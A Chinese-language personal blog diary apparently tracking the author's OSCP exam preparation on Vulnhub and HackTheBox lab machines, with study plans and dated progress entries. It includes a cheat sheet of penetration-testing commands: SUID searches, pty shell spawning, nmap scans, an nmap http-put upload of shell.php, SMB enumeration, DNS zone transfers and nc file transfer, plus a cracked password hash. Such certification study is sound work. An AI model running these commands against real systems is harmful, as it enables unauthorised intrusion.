一期
只有一点点基础知识的我
看着Google和vulnhub
一边刷练习
一边看笔记
慢慢也有了自己的知识框架
但是还是感觉准备的不充分
笔记
之前就拿CSDN做笔记了
每篇博客都很少有文字
大多都是我的操作截图
不是特别正规
为了备战
明天开始用官方的报告来写
但是他是五个一组
就是在一个文件中
要对五个靶机进行描述
希望我可以一天打五个靶机吧(现在一天最多3)
报告模板已经给了链接
有需要的可以去下载
靶机
靶机的话
之前一直练的Vulnhub
但是要下载
很费时间也很麻烦
而且网上关于win的靶机推荐
对于Vulnhub很少
目前我就看见了一个scream的
所以明天开始改用HTB
对对对!
还有BOF!!!!
都是我的短板
需要加强练习
希望刷完HTB我可以直接参加考试
附上靶机列表
总共49个靶机
加上我电脑里还有一个没做的Vulnhub
刚好50个
五个一组
可以刷10次
关于BOF的话
贴个链接
如果有小伙伴有更好的BOF学习链接的话
可以私信交流一哈
25 point buffer overflow machine
25 point behemoth riddled with rabbit holes
2 x 20 point machines
10 point machine
关于考试备考
这有个博客
介绍了几个工具以及考试经过
二期
目标
- 在HTB上刷完类似oscp的靶机
- 学会BOF
- 熟悉对报告的整理
- 进一步对渗透技术的熟练,加快打靶机的速度
- 对常用命令、工具以及网站进行汇总,以便于在考试的时候节省时间
一些常用命令
find / -user root -perm -4000 -print 2>/dev/null
python3 -c 'import pty;pty.spawn("/bin/bash");'
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.48 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports -sT 10.10.10.48
nmap -p 80 192.168.0.160 -script http-put -script-args http-put.url='/test/shell.php',http-put.file='shell.php'
python -m SimpleHTTPServer 8000
strings -n 20 *.png
for x in 571 290 911; do nmap -Pn --max-retries 0 -p $x 10.10.10.43; done
ps -l
ps aux|grep tom
gcc *.c -o exp
uname -a
lsb_release -a
smbmap -H 10.10.10.123
smbclient --list friendzone.htb -U ""
nmap -p 445 --script=smb-enum-shares 10.10.10.123
smbclient -N \\\\10.10.10.123\\Development
host -l friendzone.red 10.10.10.123
dig axfr @10.10.10.123 friendzone.red
$1$sugar$XYG/x4tZyZcCFe2QdDiSa1 qwe123!@#
nc -l -p 8003 > ovrflw /on your kali
nc -w 5 YourIpAddress 8003 < ovrflw /on Target
_______________________________________2020.5.2
被网络问题逼疯了
HTB挂vps能连上
但是太太太慢了
决定在vps上安装Kali
在电脑上下了几个vulnhub的靶机
先做着吧
_______________________________________2020.5.19
问题完美解决了 传送门
_______________________________________2020.5.25
hack the box的靶机也刷了一大半了
本想把缓冲区留在最后
做题的时候还是没避开
就提前学了学原理和linux的利用
htb关于linux的靶机还有3个了
我觉得实战对于我来说非常有用
一边学一边练
感觉自己最近学会了很多知识
后天就要进行win的靶机练习了
不知道会怎么样
还有点慌张
希望十天之内也能刷完win的htb靶机
然后再来十天主攻缓冲区
接着就考试
尽量早点考试把
希望在七月一能结束这个证
然后趁着没开学
再考两个证
七月一个八月一个
开学
美滋滋
_______________________________________2020.5.26
今天算是完成了htb和vulnhub的所有linux靶机了
明天开始window靶机
18台+(后面提到的)17台
35台在二号完成
然后报名
七天时间熟练缓冲区和报告
我觉得足够了
六月十号开始正式的oscp实验室练习
希望十五天就能考试
因为我要做的事情太多了
今天就休息一下吧
_______________________________________2020.6.4
到今天为止
表格里的HTB靶机都刷完了
学到了很多
接下来不刷什么了
开始整理一下之前联系过的靶机的知识
收集一下脚本、工具和命令
汇总一下
在一个星期内完成
然后开始oscp的lab练习
如果快的话
希望在15天内考完
如果慢的话
也希望在7.1之前考完
网上说HTB要是oscp的难度的两倍
所以我感觉自己应该能提前通过考试吧
加油